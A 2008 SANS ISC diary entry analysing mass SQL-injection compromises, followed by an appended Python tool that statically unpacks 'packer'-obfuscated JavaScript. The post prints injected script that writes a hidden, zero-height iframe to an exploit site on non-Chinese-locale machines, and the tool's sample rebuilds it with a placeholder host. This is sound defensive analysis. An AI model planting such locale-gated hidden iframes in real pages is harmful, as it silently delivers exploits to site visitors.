
SANS ISC: InfoSec Handlers Diary Blog - SANS Internet Storm Center


War of the worlds?

Published: 2008-05-14
Last Updated: 2008-05-14 00:31:33 UTC
by Bojan Zdrnja (Version: 1)
0 comment(s)

There have been a lot of discussions going on about these injection attacks. The one thing they have had in common so far is that the culprits are abusing security vulnerabilities in various web applications, mainly through SQL injection.

Exploiting such vulnerabilities became relatively easy (since many vulnerable applications use similar backend logic), so the bad guys started releasing tools that let them compromise sites automatically. I analyzed one such tool at, which was probably used for a lot of the SQL injection attacks we have seen lately (but be aware that other similar tools exist and are actively used in the underground; one such tool in use with botnets was analyzed by Joe at SecureWorks,

The motive for this is more or less standard – steal credentials or virtual goods that can be converted or sold for real money (Mike and Steven from Shadowserver posted very nice articles at and ). However, while analyzing one such site today I saw an interesting rant, presumably by the author.

The site has already been mentioned multiple times (, which appears to have finally been taken down). The majority of the attacks actually pointed to this site, which happily served exploits to the end user. However, this time the main index.htm file had this text appended at the bottom:

"This is a mass invasion.        Safeguard the motherland's dignity!
I love my motherland!
Please understand that I

(language edited)
Interesting. While this could have been added by anyone, I found another interesting thing thanks to a heads-up from our friend Paul from . Paul analyzed a compromised site that had this piece of JavaScript inserted:

n(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp}('8(b.e==\'i-2\
'){}4{3.g("<9d=7:\/\/h.c.2\/a.6 f=15=0><\/9>");}',62,19,'|100|cn|document|else|height|htm|http|if|iframe|index

After deobfuscating the code, we get this:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe
src=" width=100 height=0></iframe>");}

In other words, the code checks whether the navigator.systemLanguage variable is set to zh-cn (the value on systems running a Chinese locale) and writes the hidden, zero-height iframe pointing to the exploit site only if it is not. So the rant might really be from the author after all, since the code attacks only non-Chinese machines. Are things getting more serious here, or is the bottom line still (and only) information stealing and money?
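The packed snippet above has the layout of the widely used p,a,c,k,e,r obfuscator (the `e=function(){return'\\w+'}` / `new RegExp('\\b'+e(c)+'\\b','g')` tail and the `,62,19,'|100|cn|...'` argument list are its signature). The following unpacker is an added example written for this diary, not code from the post or from ISC; it decodes such blobs offline, without evaluating any JavaScript, and then flags the two things that matter for triage here: a locale gate on `systemLanguage` and an iframe with zero height or width. The embedded sample is constructed to mirror the diary's snippet (radix 62, 19 words, the same payload shape) with the exploit host replaced by the placeholder `bad.invalid`.

```python
import re

# Constructed sample in p,a,c,k,e,r layout, mirroring the snippet in the diary.
# The exploit host is the placeholder "bad.invalid" (RFC 2606 reserved TLD), not
# the real site from the post.
PACKED = (
    r"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))"
    r"+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};"
    r"if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}"
    r"k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};"
    r"while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}"
    r"return p}('8(b.e==\'i-2\'){}4{3.g(\"<9 d=7:\/\/h.c\/a.6 f=1 5=0><\/9>\");}'"
    r",62,19,'|100|cn|document|else|height|htm|http|if|iframe|index|navigator"
    r"|invalid|src|systemLanguage|width|writeln|bad|zh'.split('|'),0,{}))"
)

# Matches the trailing call:  }('payload',radix,count,'w1|w2|...'.split('|')
WRAPPER = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S,
)

DIGITS36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_base(c, radix):
    """Reproduce the packer's e(c): base-`radix` digits using 0-9a-z, then A-Z."""
    prefix = "" if c < radix else encode_base(c // radix, radix)
    c %= radix
    return prefix + (chr(c + 29) if c > 35 else DIGITS36[c])


def js_unescape(s):
    """Minimal unescape of a JS single-quoted literal (\\' \\" \\/ \\\\ \\n \\t)."""
    return re.sub(r"\\(.)",
                  lambda m: {"n": "\n", "t": "\t", "r": "\r"}.get(m.group(1), m.group(1)),
                  s)


def unpack(payload, radix, count, words):
    """Replace every \\w+ token in the payload with its dictionary word.

    An empty dictionary entry means the token stands for itself (k[c]||e(c)).
    """
    table = {}
    for c in range(count):
        token = encode_base(c, radix)
        table[token] = words[c] if c < len(words) and words[c] else token
    return re.sub(r"\w+", lambda m: table.get(m.group(0), m.group(0)), payload)


def deobfuscate(packed):
    """Statically unpack a p,a,c,k,e,r blob; never executes the script."""
    m = WRAPPER.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k,e,r blob")
    payload, radix, count, words = m.groups()
    return unpack(js_unescape(payload), int(radix), int(count),
                  js_unescape(words).split("|"))


def has_locale_gate(js):
    """True if the script branches on navigator.systemLanguage being zh-cn."""
    return re.search(r"systemLanguage\s*[!=]==?\s*['\"]zh-cn['\"]", js, re.I) is not None


def hidden_iframe_sources(js):
    """Return src values of iframes rendered with zero height or width."""
    found = []
    for attrs in re.findall(r"<iframe\b([^>]*)>", js, re.I):
        src = re.search(r"src\s*=\s*[\"']?([^\s\"'>]+)", attrs, re.I)
        hidden = re.search(r"\b(?:height|width)\s*=\s*[\"']?0\b", attrs, re.I)
        if src and hidden:
            found.append(src.group(1))
    return found


def analyze(packed):
    """Unpack and summarize the indicators a responder wants from the sample."""
    js = deobfuscate(packed)
    return {"source": js,
            "locale_gate": has_locale_gate(js),
            "hidden_iframes": hidden_iframe_sources(js)}


if __name__ == "__main__":
    for key, value in analyze(PACKED).items():
        print(f"{key}: {value}")
```

The unpacker mirrors the fallback branch of the packer's own decoder (a word-boundary substitution of every token), so it recovers the same text a browser would produce, but without giving the sample an execution environment. Tokens that are not in the dictionary are left untouched rather than turned into `undefined`, which keeps partial or hand-edited blobs readable.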



Keywords: malware